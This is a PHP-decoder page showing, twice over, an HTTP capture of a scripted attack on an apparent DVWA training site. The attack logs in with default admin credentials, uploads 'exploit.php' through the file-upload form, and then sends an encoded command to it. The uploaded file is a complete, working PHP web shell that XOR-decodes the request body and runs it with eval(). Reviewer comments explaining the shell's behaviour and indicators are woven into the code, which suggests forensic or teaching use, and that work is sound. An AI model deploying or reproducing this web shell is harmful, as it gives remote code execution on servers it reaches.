PHP Decode
GET /vulnerabilities/upload/ HTTP/1.1 Host: www.drsepsforensicsfun.com User-Agent: pytho..
Decoded Output download
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
GET /login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requesAts/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
POST /login.php/login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
POST /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 1284
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"
exploit.php
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="Upload"
Upload
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"
<?php
// Encodes $data as URL-safe Base64: standard Base64 output with '+' and '/' replaced by
// '-' and '_', and any trailing '=' padding stripped.
// In this sample it is only used to encode the response body sent back to the client.
function base64url_encode($data) {
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
// Decodes URL-safe Base64: maps '-' and '_' back to '+' and '/' and passes the result to
// base64_decode() (called without the strict flag).
// NOTE(review): the str_pad() target length is strlen($data) % 4, which is never larger
// than strlen($data), so str_pad() returns its input unchanged and no '=' padding is ever
// restored here. Decoding relies on base64_decode() tolerating unpadded input.
function base64url_decode($data) {
return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
}
// Repeating-key XOR: every byte of $p is XORed with the byte of $k at index ($i mod strlen($k)).
// XOR with the same key is its own inverse, so this one routine serves both to recover the
// incoming payload and to obscure the outgoing response. It is obfuscation, not encryption:
// anyone holding the hard-coded key from the file can read captured traffic.
function x($k, $p){
$c = "";
$l = strlen($k);
$pl = strlen($p);
for($i = 0; $i < $pl; $i++) {
$c .= $k[$i % $l] ^ $p[$i];
}
return $c;
}
// Request handler of the uploaded file: reads an obfuscated payload from the POST body,
// evaluates it as PHP, and returns the obfuscated output. This is web-shell behaviour.
// Triage notes for this capture: the file was accepted by the upload form with a .php name
// and is then requested from the uploads directory, so the defect to fix is on the upload
// handler and web-server side (type/extension validation, no script execution in the
// upload directory).

// Hard-coded XOR key; useful as a content indicator when searching the web root or captures.
$k = 'bdbd9167c0eedf53';
// Raw request body, not $_POST, so the body is not URL-decoded before parsing.
$content = file_get_contents("php://input");
// Body is treated as "<field0>=<field1>".
$split = explode("=", $content);
// NOTE(review): strcmp() returns 0 when the strings are equal, so this branch is taken when
// the decoded first field is NOT exactly 's3p3hr'. The marker therefore does not restrict
// who can reach eval() below; treat the file as usable by any client that can request it.
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
$decrypted = x($k,$decoded);
// Output buffering captures whatever the evaluated code prints.
ob_start();
try {
// Executes request-supplied PHP source. eval() fed from php://input is the core indicator.
eval($decrypted);
}
catch (exception $e) {
print($e->getMessage());
}
// Captured output is XORed with the same key, Base64url-encoded and written as the
// response body followed by a newline, so responses look like a single opaque token.
$o = ob_get_contents();
$c = x($k, $o);
$e = base64url_encode($c);
ob_end_clean();
print($e . "
");
}
?>
--7b0932bb9aaddf05434a5ee8bd74524d--
POST /hackable/uploads/exploit.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 41
czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf
Original Code
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
GET /login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requesAts/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc
POST /login.php/login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
POST /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 1284
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"
exploit.php
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="Upload"
Upload
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"
<?php
// Encodes $data as URL-safe Base64: standard Base64 output with '+' and '/' replaced by
// '-' and '_', and any trailing '=' padding stripped.
// In this sample it is only used to encode the response body sent back to the client.
function base64url_encode($data) {
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
// Decodes URL-safe Base64: maps '-' and '_' back to '+' and '/' and passes the result to
// base64_decode() (called without the strict flag).
// NOTE(review): the str_pad() target length is strlen($data) % 4, which is never larger
// than strlen($data), so str_pad() returns its input unchanged and no '=' padding is ever
// restored here. Decoding relies on base64_decode() tolerating unpadded input.
function base64url_decode($data) {
return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
}
// Repeating-key XOR: every byte of $p is XORed with the byte of $k at index ($i mod strlen($k)).
// XOR with the same key is its own inverse, so this one routine serves both to recover the
// incoming payload and to obscure the outgoing response. It is obfuscation, not encryption:
// anyone holding the hard-coded key from the file can read captured traffic.
function x($k, $p){
$c = "";
$l = strlen($k);
$pl = strlen($p);
for($i = 0; $i < $pl; $i++) {
$c .= $k[$i % $l] ^ $p[$i];
}
return $c;
}
// Request handler of the uploaded file: reads an obfuscated payload from the POST body,
// evaluates it as PHP, and returns the obfuscated output. This is web-shell behaviour.
// Triage notes for this capture: the file was accepted by the upload form with a .php name
// and is then requested from the uploads directory, so the defect to fix is on the upload
// handler and web-server side (type/extension validation, no script execution in the
// upload directory).

// Hard-coded XOR key; useful as a content indicator when searching the web root or captures.
$k = 'bdbd9167c0eedf53';
// Raw request body, not $_POST, so the body is not URL-decoded before parsing.
$content = file_get_contents("php://input");
// Body is treated as "<field0>=<field1>".
$split = explode("=", $content);
// NOTE(review): strcmp() returns 0 when the strings are equal, so this branch is taken when
// the decoded first field is NOT exactly 's3p3hr'. The marker therefore does not restrict
// who can reach eval() below; treat the file as usable by any client that can request it.
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
$decrypted = x($k,$decoded);
// Output buffering captures whatever the evaluated code prints.
ob_start();
try {
// Executes request-supplied PHP source. eval() fed from php://input is the core indicator.
eval($decrypted);
}
catch (exception $e) {
print($e->getMessage());
}
// Captured output is XORed with the same key, Base64url-encoded and written as the
// response body followed by a newline, so responses look like a single opaque token.
$o = ob_get_contents();
$c = x($k, $o);
$e = base64url_encode($c);
ob_end_clean();
print($e . "\n");
}
?>
--7b0932bb9aaddf05434a5ee8bd74524d--
POST /hackable/uploads/exploit.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 41
czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf
Function Calls
explode | 1 |
file_get_contents | 1 |
Stats
MD5 | f681a6e717736001841188a3218d1f02 |
Eval Count | 0 |
Decode Time | 281 ms |